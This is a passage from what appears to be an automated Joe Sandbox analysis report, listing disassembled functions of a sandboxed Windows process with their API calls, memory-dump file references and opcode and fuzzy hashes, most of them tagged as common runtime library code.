                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA7A9CE5,?,?,00000000,00007FF7CA7A9D9A), ref: 00007FF7CA7A9EE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast
                                                                                        • String ID:
                                                                                        • API String ID: 918212764-0
                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                        • Instruction ID: eeccf3506636d1aa6ffe31bfde24f3d782660f239bd6952502b8915579e3b420
                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                        • Instruction Fuzzy Hash: 1D219512F1C68261FB607FA6B460379A2917F8C7B2F8462B5D92D476D2CE6CA8504320
                                                                                        Function 00007FF8B830DCF0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2285875889.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2285844343.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286190303.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286212541.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff8b8300000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                        • Instruction ID: efeb553a2444813e880bdb101838b2b1a0573efb175e40619d1ddb9187c13cbc
                                                                                        • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                        • Instruction Fuzzy Hash: D1118C20A1974685FA549BAD98603B9A390AF8CFD0F0C5234DB1E8B3D5DF2DF4528748
                                                                                        Function 00007FF7CA7AB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                        • Instruction ID: f715749b8c7a1d3fb6fd424840336543f19b0d17edcee2154132483546f41447
                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                        • Instruction Fuzzy Hash: FF41B23290820197FA24AE56F56117DF3A0FB997A2F942171DA8A836D0CF3CED42C770
                                                                                        Function 00007FF7CA7976A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 840049012-0
                                                                                        • Opcode ID: f20fc83f25fe87b3ab6b50fb916de805a51e6475b521f36dfac30c7e4f2eb634
                                                                                        • Instruction ID: 83d94fddd9bca09ea392569875febb3714e44b9349a0010cfdeae15aad2ce144
                                                                                        • Opcode Fuzzy Hash: f20fc83f25fe87b3ab6b50fb916de805a51e6475b521f36dfac30c7e4f2eb634
                                                                                        • Instruction Fuzzy Hash: 75219121B0825146FA14AE37B924BBAE741BF4DBE5FC844B2DE0D07782CE3DE441C620
                                                                                        Function 00007FF7CA7AAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                        • Instruction ID: ea2fc463f67cc339a2a8a69ec6218b864cd8f2b9d33d69960605b7369e786df0
                                                                                        • Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                        • Instruction Fuzzy Hash: 5431C022E18646A2FF01BF16A86037DA690BB58B73F9121B5DA1D173D2CE7DEC518330
                                                                                        Function 00007FF7CA7A8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                        • String ID:
                                                                                        • API String ID: 3947729631-0
                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                        • Instruction ID: 5b10f424c690cd173b8eadd34acf8b62e71e144747b41836cb77f286a3895f9a
                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                        • Instruction Fuzzy Hash: 18219F33A15705D9FB24AF65E4542EC73A0FB48329F8456BAD62C06AC5DF38D846CB60
                                                                                        Function 00007FF7CA7A52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                        • Instruction ID: e90d3fcdacc8c877a378829552b2ceb920b5f794e91d03d7896f9eb9caf1ca3f
                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                        • Instruction Fuzzy Hash: CD11C622A1D28161FA60BF42F42017EE2A4BF59BA1FD45071EB4D57AC6CF3DDC508760
                                                                                        Function 00007FF7CA7B5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                        • Instruction ID: 60d22ca11c2f3b52770c28cc929c60fbed8105e8c58c3c1dcef64521ffc8feb9
                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                        • Instruction Fuzzy Hash: B121C87261874186EB61AF19F460379B3A0FB98B65F944234DA5E476D5DF3CD8008B10
                                                                                        Function 00007FF7CA79F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                        • Instruction ID: ab56e8c3e4cb33c285bac3f77601e5407164992e197799701c2b9bd7b800ccfb
                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                        • Instruction Fuzzy Hash: 1B017021A0878240FA04AF777910469E795BB59FF1B884671DE6C17BD6DE3DD4128310
                                                                                        Function 00007FF8B83176F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2285875889.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2285844343.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286190303.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286212541.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff8b8300000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                        • String ID:
                                                                                        • API String ID: 2444027679-0
                                                                                        • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                        • Instruction ID: ef6b4eab6556568d4ed8887d9687d7f963a82f9b3ea5fd4c553fa640225c149f
                                                                                        • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                        • Instruction Fuzzy Hash: 08114921E09A0281FE615B2CE5903B96290AF08BE0F5C4139DB6D027D5DF2CF842C308
                                                                                        Function 00007FF7CA7981A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF7CA7986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7CA793FA4,00000000,00007FF7CA791925), ref: 00007FF7CA7986E9
                                                                                        • LoadLibraryExW.KERNELBASE(?,00007FF7CA795C06,?,00007FF7CA79308E), ref: 00007FF7CA7981C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 2592636585-0
                                                                                        • Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                        • Instruction ID: 97efc5be68003b177af1748d1ea1ba12fcd88c4c0044344dc5c796438a78aa4b
                                                                                        • Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                        • Instruction Fuzzy Hash: 3BD0C201F2824581FA44BF7BBA669799151AFCDBD0F889035EE1C07B56DC3CC4910B00
                                                                                        Function 00007FF7CA7AC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7CA79FFB0,?,?,?,00007FF7CA7A161A,?,?,?,?,?,00007FF7CA7A2E09), ref: 00007FF7CA7AC94A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                        • Instruction ID: 9b5f142718a156e89b28036550ac1cbc8fdf74b58dbe368036d57a75087aa942
                                                                                        • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                        • Instruction Fuzzy Hash: 04F03A51B19247A5FE547EE3797167591807F9CBB3F88A2B09D2E462C1DE1CA8448130

                                                                                        Non-executed Functions

                                                                                        Function 00007FF7CA7979B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797A1B
                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797A9E
                                                                                        • DeleteFileW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ABD
                                                                                        • FindNextFileW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ACB
                                                                                        • FindClose.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ADC
                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797AE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                        • String ID: %s\*
                                                                                        • API String ID: 1057558799-766152087
                                                                                        • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                        • Instruction ID: 80abd8950a2015ed5aae56bb5fd8ae3311cb3c64894ae9b80c3d978894136bca
                                                                                        • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                        • Instruction Fuzzy Hash: 90418121A0C64295FA20BF3AB4649FAA360FB9C776FC40273D95D42694DE3CD6498750
                                                                                        Function 00007FF7CA79C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                        • Instruction ID: fe7a976ad11d79304e168e7d829824812e7c869bcf1f32b4933ca3257193fedb
                                                                                        • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                        • Instruction Fuzzy Hash: 68315EB2608B818AFB609F61F8507EEB364FB98755F84403ADA4D47B94DF38C548C724
                                                                                        Function 00007FF7CA7A9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                        • Instruction ID: 00dd2e426002bad5361d083163e6dfe6f1aeb458ce75c1571a0537030636f3de
                                                                                        • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                        • Instruction Fuzzy Hash: 9D318F32608B8195EB20DF26F8506EEB3A4FB88765F900136EE9D47B54DF38C555CB10
                                                                                        Function 00007FF7CA7B0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 2227656907-0
                                                                                        • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                        • Instruction ID: d656eb3652bd55c336a83db04dca9c53e0febc12def27aa4012eec6cd49f9ee6
                                                                                        • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                        • Instruction Fuzzy Hash: B5B1B5A2B1878241FA60AF23B4285B9A350FB68BF5F845171EE5D07BD5DF3CE4428314
                                                                                        Function 00007FF7CA7977D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF7CA7986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7CA793FA4,00000000,00007FF7CA791925), ref: 00007FF7CA7986E9
                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7CA797C97,?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA79782C
                                                                                          • Part of subcall function 00007FF7CA7926C0: MessageBoxW.USER32 ref: 00007FF7CA792736
                                                                                        Strings
                                                                                        Memory Dump Source
